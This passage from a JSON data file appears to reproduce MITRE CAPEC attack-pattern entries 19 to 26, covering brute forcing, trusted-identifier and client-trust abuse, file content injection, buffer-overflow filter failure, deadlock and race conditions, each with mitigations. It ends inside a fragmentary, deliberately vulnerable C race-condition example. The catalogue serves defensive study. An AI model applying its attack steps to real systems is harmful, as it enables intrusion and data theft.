privilege to write/upload scripts."},"Skills_Required":{"Skill":["To load malicious script into open, e.g. world writable directory",{"Level":"Low"},"Executing remote scripts on host and collecting output",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Use browser technologies that do not allow client side scripting.","Utilize strict type, character, and encoding enforcement.","Server side developers should not proxy content via XHR or other means. If a HTTP proxy for remote content is setup on the server side, the client\'s browser has no way of discerning where the data is originating from.","Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Perform input validation for all remote content.","Perform output validation for all remote content.","Disable scripting languages such as JavaScript in browser","Session tokens for specific host","Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.","Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode"]},"Example_Instances":{"Example":[{"p":["Ajax applications enable rich functionality for browser based web applications. Applications like Google Maps deliver unprecedented ability to zoom in and out, scroll graphics, and change graphic presentation through Ajax. The security issues that an attacker may exploit in this instance are the relative lack of security features in JavaScript and the various browser\'s implementation of JavaScript, these security gaps are what XSS and a host of other client side vulnerabilities are based on. While Ajax may not open up new security holes, per se, due to the conversational aspects between client and server of Ajax communication, attacks can be optimized. A single zoom in or zoom out on a graphic in an Ajax application may round trip to the server dozens of times. One of the first steps many attackers take is frequently footprinting an environment, this can include scanning local addresses like 192.*.*.* IP addresses, checking local directories, files, and settings for known vulnerabilities, and so on.","The XSS script that is embedded in a given IMG tag can be manipulated to probe a different address on every click of the mouse or other motions that the Ajax application is aware of.","In addition the enumerations allow for the attacker to nest sequential logic in the attacks. While Ajax applications do not open up brand new attack vectors, the existing attack vectors are more than adequate to execute attacks, and now these attacks can be optimized to sequentially execute and enumerate host environments."],"div":["",{"style":"margin-left:10px;","class":"informative"}]},"~/.bash_profile and ~/.bashrc are executed in a user\'s context when a new shell opens or when a user logs in so that their environment is set correctly. ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), ~/.bash_profile is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, ~/.bashrc is executed. This allows users more fine grained control over when they want certain commands executed. These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1546.004","Entry_Name":"Event Triggered Execution:.bash_profile and .bashrc"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Execution_Flow, Taxonomy_Mappings"}]}},"20":{"ID":"20","Name":"Encryption Brute Forcing","Abstraction":"Standard","Status":"Draft","Description":"An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"112"},{"Nature":"CanPrecede","CAPEC_ID":"668"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Determine the ciphertext and the encryption algorithm."},{"Step":"2","Phase":"Experiment","Description":"Perform an exhaustive brute force search of the key space, producing candidate plaintexts and observing if they make sense."}]},"Prerequisites":{"Prerequisite":["Ciphertext is known.","Encryption algorithm and key size are known."]},"Skills_Required":{"Skill":["Brute forcing encryption does not require much skill.",{"Level":"Low"}]},"Resources_Required":{"Resource":{"p":["A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge).","On average, for a binary key of size N, 2^(N/2) trials will be needed to find the key that would decrypt the ciphertext to obtain the original plaintext.","Obviously as N gets large the brute force approach becomes infeasible."]}},"Indicators":{"Indicator":"None. This attack happens offline."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long.","In theory a brute force attack performing an exhaustive key space search will always succeed, so the goal is to have computational security. Moore\'s law needs to be taken into account that suggests that computing resources double every eighteen months."]},"Example_Instances":{"Example":"In 1997 the original DES challenge used distributed net computing to brute force the encryption key and decrypt the ciphertext to obtain the original plaintext. Each machine was given its own section of the key space to cover. The ciphertext was decrypted in 96 days."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"326"},{"CWE_ID":"327"},{"CWE_ID":"693"},{"CWE_ID":"1204"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"}}},"21":{"ID":"21","Name":"Exploitation of Trusted Identifiers","Abstraction":"Meta","Status":"Stable","Description":{"p":["An adversary guesses, obtains, or \\"rides\\" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service. Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.","Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \\"trust\\" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. An adversary may also \\"ride\\" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.","Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application."]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for Indicators of Susceptibility] Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.","Technique":["Spider all available pages","Attack known bad interfaces","Search outward-facing configuration and properties files for identifiers."]},{"Step":"2","Phase":"Experiment","Description":"[Fetch samples] The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.","Technique":["An adversary makes many anonymous connections and records the session IDs assigned.","An adversary makes authorized connections and records the session tokens or credentials issued.","An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system."]},{"Step":"3","Phase":"Exploit","Description":"[Impersonate] An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application"},{"Step":"4","Phase":"Exploit","Description":"[Spoofing] Malicious data can be injected into the target system or into a victim user\'s system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks."},{"Step":"5","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can obtain sensitive data contained within the system or application."}]},"Prerequisites":{"Prerequisite":["Server software must rely on weak identifier proof and/or verification schemes.","Identifiers must have long lifetimes and potential for reusability.","Server software must allow concurrent sessions to exist."]},"Skills_Required":{"Skill":["To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user",{"Level":"Low"}]},"Resources_Required":{"Resource":["Ability to deploy software on network.","Ability to communicate synchronously or asynchronously with server."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: utilize strong federated identity such as SAML to encrypt and sign identity tokens in transit.","Implementation: Use industry standards session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf.","Implementation: If the identifier is used for authentication, such as in the so-called single sign on use cases, then ensure that it is protected at the same level of assurance as authentication tokens.","Implementation: If the web or application server supports it, then encrypting and/or signing the identifier (such as cookie) can protect the ID if intercepted.","Design: Use strong session identifiers that are protected in transit and at rest.","Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated.","Implementation: Verify authenticity of all identifiers at runtime."]},"Example_Instances":{"Example":[{"p":["Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an adversary to impersonate a user\'s session in effect, have the same capabilities as the authorized user. There are two main ways for an adversary to exploit session IDs.","A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.","The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application."]},"For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"290"},{"CWE_ID":"302"},{"CWE_ID":"346"},{"CWE_ID":"539"},{"CWE_ID":"6"},{"CWE_ID":"384"},{"CWE_ID":"664"},{"CWE_ID":"602"},{"CWE_ID":"642"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1134","Entry_Name":"Access Token Manipulation"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, @Status, Consequences, Description, Example_Instances, Execution_Flow, Mitigations, Prerequisites, Resources_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["Exploitation of Session Variables, Resource IDs and other Trusted Credentials",{"Date":"2015-11-09"},"Exploitation of Trusted Credentials",{"Date":"2020-07-30"}]}},"22":{"ID":"22","Name":"Exploiting Trust in Client","Abstraction":"Meta","Status":"Draft","Description":"An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Prerequisites":{"Prerequisite":"Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side."},"Skills_Required":{"Skill":["The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Ability to communicate synchronously or asynchronously with server"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Ensure that client process and/or message is authenticated so that anonymous communications and/or messages are not accepted by the system.","Design: Do not rely on client validation or encoding for security purposes.","Design: Utilize digital signatures to increase authentication assurance.","Design: Utilize two factor authentication to increase authentication assurance.","Implementation: Perform input validation for all remote content."]},"Example_Instances":{"Example":["Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.","Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.","Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.","Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server\'s policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"290"},{"CWE_ID":"287"},{"CWE_ID":"20"},{"CWE_ID":"200"},{"CWE_ID":"693"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Description"}],"Previous_Entry_Name":["Exploiting Trust in Client (aka Make the Client Invisible)",{"Date":"2015-12-07"}]}},"23":{"ID":"23","Name":"File Content Injection","Abstraction":"Standard","Status":"Draft","Description":"An attack of this type exploits the host\'s trust in executing remote content, including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the adversary and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The adversary exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the adversary knows the standard handling routines and can identify vulnerabilities and entry points, they can be exploited by otherwise seemingly normal content. Once the attack is executed, the adversary\'s program can access relative directories such as C:\\\\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"242"},{"Nature":"CanAlsoBe","CAPEC_ID":"165"}]},"Prerequisites":{"Prerequisite":["The target software must consume files.","The adversary must have access to modify files that the target software will consume."]},"Skills_Required":{"Skill":["How to poison a file with malicious payload that will exploit a vulnerability when the file is opened. The adversary must also know how to place the file onto a system where it will be opened by an unsuspecting party, or force the file to be opened.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Validate all input for content including files. Ensure that if files and remote content must be accepted that once accepted, they are placed in a sandbox type location so that lower assurance clients cannot write up to higher assurance processes (like Web server processes for example)","Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.","Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.","Implementation: Virus scanning on host","Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin."]},"Example_Instances":{"Example":{"p":"PHP is a very popular language used for developing web applications. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the adversary can directly access and execute them through a browser. This vulnerability allows remote adversaries to execute arbitrary code on the system, and can result in the adversary being able to erase intrusion evidence from system and application logs."}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"20"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Example_Instances, References"}],"Previous_Entry_Name":["File System Function Injection, Content Based",{"Date":"2015-12-07"}]}},"24":{"ID":"24","Name":"Filter Failure through Buffer Overflow","Abstraction":"Detailed","Status":"Draft","Description":"In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"100"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey] The attacker surveys the target application, possibly as a valid and authenticated user","Technique":["Spidering web sites for inputs that involve potential filtering","Brute force guessing of filtered inputs"]},{"Step":"2","Phase":"Experiment","Description":"[Attempt injections] Try to feed overly long data to the system. This can be done manually or a dynamic tool (black box) can be used to automate this. An attacker can also use a custom script for that purpose.","Technique":["Brute force attack through black box penetration test tool.","Fuzzing of communications protocols","Manual testing of possible inputs with attack data."]},{"Step":"3","Phase":"Experiment","Description":"[Monitor responses] Watch for any indication of failure occurring. Carefully watch to see what happened when filter failure occurred. Did the data get in?","Technique":["Boron tagging. Choose clear attack inputs that are easy to notice in output. In binary this is often 0xa5a5a5a5 (alternating 1s and 0s). Another obvious tag value is all zeroes, but it is not always obvious what goes wrong if the null values get into the data.","Check Log files. An attacker with access to log files can look at the outcome of bad input."]},{"Step":"4","Phase":"Exploit","Description":"[Abuse the system through filter failure] An attacker writes a script to consistently induce the filter failure.","Technique":["DoS through filter failure. The attacker causes the system to crash or stay down because of its failure to filter properly.","Malicious code execution. An attacker introduces a malicious payload and executes arbitrary code on the target system.","An attacker can use the filter failure to introduce malicious data into the system and leverage a subsequent SQL injection, Cross Site Scripting, Command Injection or similar weakness if it exists."]}]},"Prerequisites":{"Prerequisite":"Ability to control the length of data passed to an active filter."},"Skills_Required":{"Skill":["An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS.",{"Level":"Low"},"Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",{"Level":"High"}]},"Indicators":{"Indicator":"Many exceptions are thrown by the application\'s filter modules in a short period of time. Check the logs. See if the probes are coming from the same IP address."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs.","Pre-design: Use a language or compiler that performs automatic bounds checking.","Pre-design through Build: Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.","Operational: Use OS-level preventative functionality. Not a complete solution.","Design: Use an abstraction library to abstract away risky APIs. Not a complete solution."]},"Example_Instances":{"Example":[{"div":["Attack Example: Filter Failure in Taylor UUCP Daemon",{"style":"color:#32498D; font-weight:bold;"}],"p":"Sending in arguments that are too long to cause the filter to fail open is one instantiation of the filter failure attack. The Taylor UUCP daemon is designed to remove hostile arguments before they can be executed. If the arguments are too long, however, the daemon fails to remove them. This leaves the door open for attack."},"A filter is used by a web application to filter out characters that may allow the input to jump from the data plane to the control plane when data is used in a SQL statement (chaining this attack with the SQL injection attack). Leveraging a buffer overflow the attacker makes the filter fail insecurely and the tainted data is permitted to enter unfiltered into the system, subsequently causing a SQL injection.","Audit Truncation and Filters with Buffer Overflow. Sometimes very large transactions can be used to destroy a log file or cause partial logging failures. In this kind of attack, log processing code might be examining a transaction in real-time processing, but the oversized transaction causes a logic branch or an exception of some kind that is trapped. In other words, the transaction is still executed, but the logging or filtering mechanism still fails. This has two consequences, the first being that you can run transactions that are not logged in any way (or perhaps the log entry is completely corrupted). The second consequence is that you might slip through an active filter that otherwise would stop your attack."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"118"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"}]}},"25":{"ID":"25","Name":"Forced Deadlock","Abstraction":"Meta","Status":"Stable","Description":"The adversary triggers and exploits a deadlock condition in the target software to cause a denial of service. A deadlock can occur when two or more competing actions are waiting for each other to finish, and thus neither ever does. Deadlock conditions can be difficult to detect.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary initiates an exploratory phase to get familiar with the system."},{"Step":"2","Phase":"Explore","Description":"The adversary triggers a first action (such as holding a resource) and initiates a second action which will wait for the first one to finish."},{"Step":"3","Phase":"Explore","Description":"If the target program has a deadlock condition, the program waits indefinitely resulting in a denial of service."}]},"Prerequisites":{"Prerequisite":["The target host has a deadlock condition. There are four conditions for a deadlock to occur, known as the Coffman conditions. [REF-101]","The target host exposes an API to the user."]},"Skills_Required":{"Skill":["This type of attack may be sophisticated and require knowledge about the system\'s resources and APIs.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption","Note":"A successful forced deadlock attack compromises the availability of the system by exhausting its available resources."}},"Mitigations":{"Mitigation":["Use known algorithm to avoid deadlock condition (for instance non-blocking synchronization algorithms).","For competing actions, use well-known libraries which implement synchronization."]},"Example_Instances":{"Example":"An example of a deadlock which may occur in database products is the following. Client applications using the database may require exclusive access to a table, and in order to gain exclusive access they ask for a lock. If one client application holds a lock on a table and attempts to obtain the lock on a second table that is already held by a second client application, this may lead to deadlock if the second application then attempts to obtain the lock that is held by the first application (Source: Wikipedia, http://en.wikipedia.org/wiki/Deadlock)"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"412"},{"CWE_ID":"567"},{"CWE_ID":"662"},{"CWE_ID":"667"},{"CWE_ID":"833"},{"CWE_ID":"1322"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-101","Section":"Deadlock"},{"External_Reference_ID":"REF-609","Section":"Testing for XML Injection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns, Type (Relationship -> Attack_Pattern)"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Phases, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Probing_Techniques, Related_Weaknesses, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"26":{"ID":"26","Name":"Leveraging Race Conditions","Abstraction":"Meta","Status":"Stable","Description":"The adversary targets a race condition occurring when multiple processes access and manipulate the same resource concurrently, and the outcome of the execution depends on the particular order in which the access takes place. The adversary can leverage a race condition by \\"running the race\\", modifying the resource and modifying the normal execution flow. For instance, a race condition can occur while accessing a file: the adversary can trick the system by replacing the original file with their version and cause the system to read the malicious file.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary explores to gauge what level of access they have."},{"Step":"2","Phase":"Experiment","Description":"The adversary gains access to a resource on the target host. The adversary modifies the targeted resource. The resource\'s value is used to determine the next normal execution action."},{"Step":"3","Phase":"Exploit","Description":"The resource is modified/checked concurrently by multiple processes. By using one of the processes, the adversary is able to modify the value just before it is consumed by a different process. A race condition occurs and is exploited by the adversary to abuse the target host."}]},"Prerequisites":{"Prerequisite":["A resource is accessed/modified concurrently by multiple processes such that a race condition exists.","The adversary has the ability to modify the resource."]},"Skills_Required":{"Skill":["Being able to \\"run the race\\" requires basic knowledge of concurrent processing including synchonization techniques.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Use safe libraries to access resources such as files.","Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition.","Use synchronization to control the flow of execution.","Use static analysis tools to find race conditions.","Pay attention to concurrency problems related to the access of resources."]},"Example_Instances":{"Example":["The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client. See also: CVE-2007-1057",{"p":"The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an attacker can replace the file referenced by the name (see [REF-107]).","div":["include ",{"style":"margin-left:10px;","class":"informative","div":["int fd;",{"style":"margin-left:10px;","div":["return;",{"style":"margin-left:10px;"}]},"char *userstr;",{"style":"margin-left:10px;","div":["userstr = 